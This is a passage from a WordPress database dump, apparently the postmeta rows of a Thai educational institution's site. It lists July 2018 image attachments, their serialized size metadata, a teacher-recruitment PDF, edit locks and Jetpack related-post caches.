(7750, 3386, '_wp_attached_file', '2018/07/10-7-2561-10-29-52.jpg'),
(7751, 3386, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:691;s:6:\"height\";i:331;s:4:\"file\";s:30:\"2018/07/10-7-2561-10-29-52.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:30:\"10-7-2561-10-29-52-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:30:\"10-7-2561-10-29-52-300x144.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:144;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:30:\"10-7-2561-10-29-52-400x192.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:192;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(7752, 3388, '_wp_attached_file', '2018/07/10-7-2561-10-33-19.jpg'),
(7753, 3388, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:279;s:6:\"height\";i:339;s:4:\"file\";s:30:\"2018/07/10-7-2561-10-33-19.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:30:\"10-7-2561-10-33-19-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:30:\"10-7-2561-10-33-19-247x300.jpg\";s:5:\"width\";i:247;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:30:\"10-7-2561-10-33-19-247x300.jpg\";s:5:\"width\";i:247;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(7754, 3393, '_wp_attached_file', '2018/07/65424786453.jpg'),
(7755, 3393, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:228;s:6:\"height\";i:333;s:4:\"file\";s:23:\"2018/07/65424786453.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:23:\"65424786453-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:23:\"65424786453-205x300.jpg\";s:5:\"width\";i:205;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:23:\"65424786453-205x300.jpg\";s:5:\"width\";i:205;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(7756, 3397, '_wp_attached_file', '2018/07/10-7-2561-10-56-29.jpg'),
(7757, 3397, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:735;s:6:\"height\";i:324;s:4:\"file\";s:30:\"2018/07/10-7-2561-10-56-29.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:30:\"10-7-2561-10-56-29-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:30:\"10-7-2561-10-56-29-300x132.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:132;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:30:\"10-7-2561-10-56-29-400x176.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:176;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(7758, 3400, '_wp_attached_file', '2018/07/10-7-2561-11-01-05.jpg'),
(7759, 3400, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:439;s:6:\"height\";i:329;s:4:\"file\";s:30:\"2018/07/10-7-2561-11-01-05.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:30:\"10-7-2561-11-01-05-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:30:\"10-7-2561-11-01-05-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:30:\"10-7-2561-11-01-05-400x300.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(7760, 3403, '_wp_attached_file', '2018/07/10-7-2561-11-07-53.jpg'),
(7761, 3403, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:486;s:6:\"height\";i:324;s:4:\"file\";s:30:\"2018/07/10-7-2561-11-07-53.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:30:\"10-7-2561-11-07-53-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:30:\"10-7-2561-11-07-53-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:30:\"10-7-2561-11-07-53-400x267.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:267;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(7762, 3366, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575372539;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:6312;}i:1;a:1:{s:2:\"id\";i:6040;}i:2;a:1:{s:2:\"id\";i:5936;}}}}'),
(7763, 3408, '_edit_lock', '1531301453:3'),
(7764, 3408, '_edit_last', '3'),
(7765, 3409, '_wp_attached_file', '2018/07/36923513_622727778103414_2237702695932657664_o.jpg'),
(7766, 3409, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:2048;s:6:\"height\";i:1365;s:4:\"file\";s:58:\"2018/07/36923513_622727778103414_2237702695932657664_o.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:58:\"36923513_622727778103414_2237702695932657664_o-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:58:\"36923513_622727778103414_2237702695932657664_o-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:58:\"36923513_622727778103414_2237702695932657664_o-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:59:\"36923513_622727778103414_2237702695932657664_o-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:58:\"36923513_622727778103414_2237702695932657664_o-400x267.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:267;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(7767, 3408, '_thumbnail_id', '3409'),
(7771, 3408, '_hide_featured', NULL),
(7772, 3408, '_wpas_done_all', '1'),
(7773, 3408, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575559032;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:3975;}i:1;a:1:{s:2:\"id\";i:4026;}i:2;a:1:{s:2:\"id\";i:5769;}}}}'),
(7774, 3362, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575664387;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:4887;}i:1;a:1:{s:2:\"id\";i:4961;}i:2;a:1:{s:2:\"id\";i:4971;}}}}'),
(7775, 3412, '_edit_lock', '1531380345:3'),
(7776, 3412, '_edit_last', '3'),
(7777, 3413, '_wp_attached_file', '2018/07/12-7-2561-11-32-03.jpg'),
(7778, 3413, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:196;s:6:\"height\";i:243;s:4:\"file\";s:30:\"2018/07/12-7-2561-11-32-03.jpg\";s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:30:\"12-7-2561-11-32-03-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(7779, 3414, '_wp_attached_file', '2018/07/12-7-2561-11-32-14.jpg'),
(7780, 3414, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:586;s:6:\"height\";i:159;s:4:\"file\";s:30:\"2018/07/12-7-2561-11-32-14.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:30:\"12-7-2561-11-32-14-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:29:\"12-7-2561-11-32-14-300x81.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:81;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:30:\"12-7-2561-11-32-14-400x109.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:109;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(7783, 3412, '_hide_featured', NULL),
(7784, 3418, '_edit_lock', '1531380884:3'),
(7785, 3418, '_edit_last', '3'),
(7786, 3420, '_wp_attached_file', '2018/07/12-7-2561-13-57-34.jpg'),
(7787, 3420, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:881;s:6:\"height\";i:631;s:4:\"file\";s:30:\"2018/07/12-7-2561-13-57-34.jpg\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:30:\"12-7-2561-13-57-34-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:30:\"12-7-2561-13-57-34-300x215.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:215;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:30:\"12-7-2561-13-57-34-768x550.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:30:\"12-7-2561-13-57-34-400x286.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:286;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(7788, 3422, '_wp_attached_file', '2018/07/12-7-2561-14-25-18.jpg'),
(7789, 3422, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:198;s:6:\"height\";i:245;s:4:\"file\";s:30:\"2018/07/12-7-2561-14-25-18.jpg\";s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:30:\"12-7-2561-14-25-18-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(7790, 3423, '_wp_attached_file', '2018/07/12-7-2561-14-25-37.jpg'),
(7791, 3423, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:583;s:6:\"height\";i:157;s:4:\"file\";s:30:\"2018/07/12-7-2561-14-25-37.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:30:\"12-7-2561-14-25-37-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:29:\"12-7-2561-14-25-37-300x81.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:81;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:30:\"12-7-2561-14-25-37-400x108.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:108;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(7792, 3424, '_wp_attached_file', '2018/07/12-7-2561-14-26-57.jpg'),
(7793, 3424, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:876;s:6:\"height\";i:329;s:4:\"file\";s:30:\"2018/07/12-7-2561-14-26-57.jpg\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:30:\"12-7-2561-14-26-57-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:30:\"12-7-2561-14-26-57-300x113.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:113;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:30:\"12-7-2561-14-26-57-768x288.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:288;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:30:\"12-7-2561-14-26-57-400x150.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(7794, 3427, '_edit_lock', '1531385712:3'),
(7795, 3427, '_edit_last', '3'),
(7796, 3418, '_hide_featured', NULL),
(7797, 3430, '_edit_lock', '1531385336:3'),
(7798, 3430, '_edit_last', '3'),
(7799, 3431, '_wp_attached_file', '2018/07/รับสมัครครูอัตราจ้าง-4-อัตรา.pdf'),
(7803, 3430, '_hide_featured', NULL),
(7804, 3430, '_wpas_done_all', '1'),
(7805, 3430, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575707947;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:5046;}i:1;a:1:{s:2:\"id\";i:4139;}i:2;a:1:{s:2:\"id\";i:5481;}}}}'),
(7806, 3434, '_wp_attached_file', '2018/07/12-7-2561-15-47-07.jpg'),
(7807, 3434, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:193;s:6:\"height\";i:243;s:4:\"file\";s:30:\"2018/07/12-7-2561-15-47-07.jpg\";s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:30:\"12-7-2561-15-47-07-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(7808, 3435, '_wp_attached_file', '2018/07/12-7-2561-15-47-22.jpg'),
(7809, 3435, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:581;s:6:\"height\";i:155;s:4:\"file\";s:30:\"2018/07/12-7-2561-15-47-22.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:30:\"12-7-2561-15-47-22-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:29:\"12-7-2561-15-47-22-300x80.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:80;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:30:\"12-7-2561-15-47-22-400x107.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:107;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(7810, 3436, '_wp_attached_file', '2018/07/12-7-2561-15-51-10.jpg'),
(7811, 3436, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:962;s:6:\"height\";i:619;s:4:\"file\";s:30:\"2018/07/12-7-2561-15-51-10.jpg\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:30:\"12-7-2561-15-51-10-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:30:\"12-7-2561-15-51-10-300x193.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:193;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:30:\"12-7-2561-15-51-10-768x494.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:494;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:30:\"12-7-2561-15-51-10-400x257.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:257;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(7812, 3437, '_wp_attached_file', '2018/07/12-7-2561-15-53-26.jpg'),
(7813, 3437, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:956;s:6:\"height\";i:618;s:4:\"file\";s:30:\"2018/07/12-7-2561-15-53-26.jpg\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:30:\"12-7-2561-15-53-26-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:30:\"12-7-2561-15-53-26-300x194.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:194;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:30:\"12-7-2561-15-53-26-768x496.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:496;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:30:\"12-7-2561-15-53-26-400x259.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:259;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(7814, 3427, '_hide_featured', NULL),
(7815, 3441, '_wp_attached_file', '2018/07/12-7-2561-16-03-55.jpg'),
(7816, 3441, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:586;s:6:\"height\";i:96;s:4:\"file\";s:30:\"2018/07/12-7-2561-16-03-55.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:29:\"12-7-2561-16-03-55-150x96.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:96;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:29:\"12-7-2561-16-03-55-300x49.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:49;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:29:\"12-7-2561-16-03-55-400x66.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:66;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(7819, 3443, '_wp_attached_file', '2018/07/12-7-2561-16-11-06.jpg'),
(7820, 3443, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:223;s:6:\"height\";i:266;s:4:\"file\";s:30:\"2018/07/12-7-2561-16-11-06.jpg\";s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:30:\"12-7-2561-16-11-06-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(7821, 3448, '_wp_attached_file', '2018/07/16-7-2561-10-54-02.jpg'),
